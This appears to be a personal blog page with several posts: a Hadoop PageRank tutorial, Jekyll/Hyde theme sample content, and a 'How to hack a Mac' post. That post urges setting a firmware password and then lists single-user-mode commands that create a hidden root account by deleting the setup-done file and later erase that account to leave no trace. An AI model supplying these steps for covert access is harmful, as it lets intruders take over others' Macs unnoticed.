How to hack a Mac

tl;dr The most important thing to set on any mac.

Do you use a mac? Do you have an open firmware password set? If not, reboot your machine, and hold down command-R to enter recovery mode. From there, select Utilities from the menubar, then click Firmware Password to set a password. Make sure you remember this. If you ever forget it, you can take your machine to an apple store where they will do some funky process and call the mothership, then reset your password. There use to be an exploit where you could reboot without one of the ram sticks and it would reset the password, but that was patched a few years ago. Besides, most machines come with RAM soldered to the motherboard these days, so it is kind of a moot point.

The open firmware password is at the hardware level, and will require the user to enter a password in order to boot any other operating system (or mode). On my mac, I have this, so if my machine were to ever be stolen, it would effectively be a brick. Since the SSD is technically removable (although non-standard) in my 15 retina MBP, a thief could theoretically remove the SSD and replace it with a blank one from other world computing, but unfortunately for them, it would be impossible to install a new OS on that drive without my firmware password, which would be very difficult to crack considering you cannot simply get a hash can run john the ripper.

Just for fun, I decided to see just how easy it would be to break into my own machine if I forgot the password. If you want to just reset the password, you can open a terminal in recovery mode, and type resetpassword to reset it. But I was more interested in how to break in without the owner knowing. If you changed the password, then it would be pretty obvious what you did. Here is what I did:

First, I rebooted into single user mode by restarting the machine and holding down command-s.

Once booted, mount the filesystem:

$ mount -uw /

Simply delete the applesetupdone file, and the next time the machine boots it will prompt you to create a new Administrator account, which convienently will have root privileges.

$ rm /var/db/.AppleSetupDone

Finally, reboot the machine.

$ reboot

At this point, you can go ahead and create a new user account which will have full root access. If you want to delete it without leaving a trace, reboot back into single user mode, then

Mount the filesystem:

$ mount -uw /

Then delete the user folder and a few other files:

$ rm /var/db/dslocal/nodes/Default/users/{username}.plist
$ rm -rf /Users/{username}

Finally, reboot the machine.

$ reboot

Please only do this on machines that you own, and make sure to set an open firmware password. Also, you could use FireVault instead of / in addition to this method, but it will not prevent you from removing the SSD and installing another os.


Want to see something else added? Open an issue.

Computing PageRank of a Large Graph on Hadoop

tl;dr Lets use a lot of computers to do some math.

For the WSDM Cup Challenge we wanted to compute the pagerank of a citation graph. In this case, the graph provided by Microsoft Research was a directed graph with 73,543,432 vertices and 757,462,733 edges. In order to do this efficiently, we are going to spin up a HD Insight Cluster on Microsoft Azure. I chose 5 D3 nodes, but this configuration can get pretty pricy. Once the cluster is deployed, ssh into the head node using the account you specified during cluster creation. Then lets get going:

I recommend doing all of this within a screen (or tmux) session.

$ screen

First download the graph with wget:

$ wget https://academicgraph.blob.core.windows.net/graph-2015-08-20/PaperReferences.zip

Then unzip it. But first we need to install p7zip (trust me, the stock unzip won't work), then we can actually unzip it.

$ sudo apt-get install p7zip-full
$ 7za x PaperReferences.zip

Now we hit the first roadblock. The graph package we will be using requires an edge file with node id's as integers, but the file we are given has strings. Never fear, let's just whip up some python to fix it.

f = open('PaperReferences.txt', 'r')
out = open('output.edges', 'w+')
ids = {}
counter = 0
for l in f:
    a, b = l.split('\t')
    if a in ids:
        a = ids[a]
    else:
        ids[a] = counter
        a = counter
        counter += 1
    if b in ids:
        b = ids[b]
    else:
        ids[b] = counter
        b = counter
        counter += 1
    out.write("{0}\t{1}\n".format(a, b))
out.close()
f.close()

Now that we have our edge file in the correct format, lets put it in HDFS:

$ hdfs dfs -mkdir [username]
$ hdfs dfs -mkdir pagerank
$ hdfs dfs -put output.edges pagerank/

One last thing - we need to know how many vertices are in the edge file:

f = open('output.edges')
m = 0
for l in f:
    a, b = l.split('\t')
    a, b = int(a), int(b)
    if a > m:
        m = a
    if b > m:
        m = b
print m

Finally, now that the edge file is in HDFS, we can run pegasus. The first argument is the number of nodes in the graph (make sure to add one to the output of the compute-max script), and the second argument is the number of reducers. The general recomendation is to use 2*n reducers where n is the number of worker nodes.

$ wget http://www.cs.cmu.edu/~pegasus/PEGASUSH-2.0.tar.gz
$ tar -xvzf PEGASUSH-2.0.tar.gz
$ cd PEGASUS/
$ ./run_pr.sh 73543432 10 pagerank nosym

If all goes well, the hadoop job will be submitted and you will be able to monitor the progress of the map and reduce phase of the job with output like:

15/11/08 22:55:57 INFO mapreduce.Job:  map 87% reduce 14%
15/11/08 22:55:59 INFO mapreduce.Job:  map 88% reduce 15%
15/11/08 22:56:05 INFO mapreduce.Job:  map 88% reduce 16%
15/11/08 22:56:08 INFO mapreduce.Job:  map 89% reduce 16%
15/11/08 22:56:18 INFO mapreduce.Job:  map 90% reduce 16%
15/11/08 22:56:25 INFO mapreduce.Job:  map 90% reduce 17%

When it finishes, you should see output like:

[PEGASUS] PageRank computed.
[PEGASUS] The final PageRanks are in the HDFS pr_vector.
[PEGASUS] The minium and maximum PageRanks are in the HDFS pr_minmax.
[PEGASUS] The histogram of PageRanks in 1000 bins between min_PageRank and max_PageRank are in the HDFS pr_distr.

Finally, you can get the files off of HDFS:

$ hdfs dfs -copyToLocal pr_vector/part-0000

The format of the output files are:

(nodeid TAB "v"PageRank_of_the_node)

Hopefully this post, while abit long, demonstrated the power of the MapReduce programming paradigm as well as how to work with large graphs. Once you're finished with the HDInsight cluster, make sure to turn it off or else you may rack up a nasty bill.

Links


Want to see something else added? Open an issue.

Introducing Hyde

Hyde is a brazen two-column Jekyll theme that pairs a prominent sidebar with uncomplicated content. It's based on Poole, the Jekyll butler.

Built on Poole

Poole is the Jekyll Butler, serving as an upstanding and effective foundation for Jekyll themes by @mdo. Poole, and every theme built on it (like Hyde here) includes the following:

  • Complete Jekyll setup included (layouts, config, 404, RSS feed, posts, and example page)
  • Mobile friendly design and development
  • Easily scalable text and component sizing with rem units in the CSS
  • Support for a wide gamut of HTML elements
  • Related posts (time-based, because Jekyll) below each post
  • Syntax highlighting, courtesy Pygments (the Python-based code snippet highlighter)

Hyde features

In addition to the features of Poole, Hyde adds the following:

  • Sidebar includes support for textual modules and a dynamically generated navigation with active link support
  • Two orientations for content and sidebar, default (left sidebar) and reverse (right sidebar), available via <body> classes
  • Eight optional color schemes, available via <body> classes

Head to the readme to learn more.

Browser support

Hyde is by preference a forward-thinking project. In addition to the latest versions of Chrome, Safari (mobile and desktop), and Firefox, it is only compatible with Internet Explorer 9 and above.

Download

Hyde is developed on and hosted with GitHub. Head to the GitHub repository for downloads, bug reports, and features requests.

Thanks!

Example content

Howdy! This is an example blog post that shows several types of HTML content supported in this theme.

Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Sed posuere consectetur est at lobortis. Cras mattis consectetur purus sit amet fermentum.

Curabitur blandit tempus porttitor. Nullam quis risus eget urna mollis ornare vel eu leo. Nullam id dolor id nibh ultricies vehicula ut id elit.

Etiam porta sem malesuada magna mollis euismod. Cras mattis consectetur purus sit amet fermentum. Aenean lacinia bibendum nulla sed consectetur.

Inline HTML elements

HTML defines a long list of available inline tags, a complete list of which can be found on the Mozilla Developer Network.

  • To bold text, use <strong>.
  • To italicize text, use <em>.
  • Abbreviations, like HTML should use <abbr>, with an optional title attribute for the full phrase.
  • Citations, like — Mark otto, should use <cite>.
  • Deleted text should use <del> and inserted text should use <ins>.
  • Superscript text uses <sup> and subscript text uses <sub>.

Most of these elements are styled by browsers with few modifications on our part.

Heading

Vivamus sagittis lacus vel augue rutrum faucibus dolor auctor. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Morbi leo risus, porta ac consectetur ac, vestibulum at eros.

Code

Cum sociis natoque penatibus et magnis dis code element montes, nascetur ridiculus mus.

// Example can be run directly in your JavaScript console

// Create a function that takes two arguments and returns the sum of those arguments
var adder = new Function("a", "b", "return a + b");

// Call the function
adder(2, 6);
// > 8

Aenean lacinia bibendum nulla sed consectetur. Etiam porta sem malesuada magna mollis euismod. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa.

Gists via GitHub Pages

Vestibulum id ligula porta felis euismod semper. Nullam quis risus eget urna mollis ornare vel eu leo. Donec sed odio dui.

Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis vestibulum. Nullam quis risus eget urna mollis ornare vel eu leo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec sed odio dui. Vestibulum id ligula porta felis euismod semper.

Lists

Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Aenean lacinia bibendum nulla sed consectetur. Etiam porta sem malesuada magna mollis euismod. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus.

  • Praesent commodo cursus magna, vel scelerisque nisl consectetur et.
  • Donec id elit non mi porta gravida at eget metus.
  • Nulla vitae elit libero, a pharetra augue.

Donec ullamcorper nulla non metus auctor fringilla. Nulla vitae elit libero, a pharetra augue.

  1. Vestibulum id ligula porta felis euismod semper.
  2. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.
  3. Maecenas sed diam eget risus varius blandit sit amet non magna.

Cras mattis consectetur purus sit amet fermentum. Sed posuere consectetur est at lobortis.

HyperText Markup Language (HTML)
The language used to describe and define the content of a Web page
Cascading Style Sheets (CSS)
Used to describe the appearance of Web content
JavaScript (JS)
The programming language used to build advanced Web sites and applications

Integer posuere erat a ante venenatis dapibus posuere velit aliquet. Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Nullam quis risus eget urna mollis ornare vel eu leo.

Images

Quisque consequat sapien eget quam rhoncus, sit amet laoreet diam tempus. Aliquam aliquam metus erat, a pulvinar turpis suscipit at.

placeholder placeholder placeholder

Tables

Aenean lacinia bibendum nulla sed consectetur. Lorem ipsum dolor sit amet, consectetur adipiscing elit.

Name Upvotes Downvotes
Totals 21 23
Alice 10 11
Bob 4 3
Charlie 7 9

Nullam id dolor id nibh ultricies vehicula ut id elit. Sed posuere consectetur est at lobortis. Nullam quis risus eget urna mollis ornare vel eu leo.


Want to see something else added? Open an issue.

What's Jekyll?

Jekyll is a static site generator, an open-source tool for creating simple yet powerful websites of all shapes and sizes. From the project's readme:

Jekyll is a simple, blog aware, static site generator. It takes a template directory [...] and spits out a complete, static website suitable for serving with Apache or your favorite web server. This is also the engine behind GitHub Pages, which you can use to host your project’s page or blog right here from GitHub.

It's an immensely useful tool and one we encourage you to use here with Hyde.

Find out more by visiting the project on GitHub.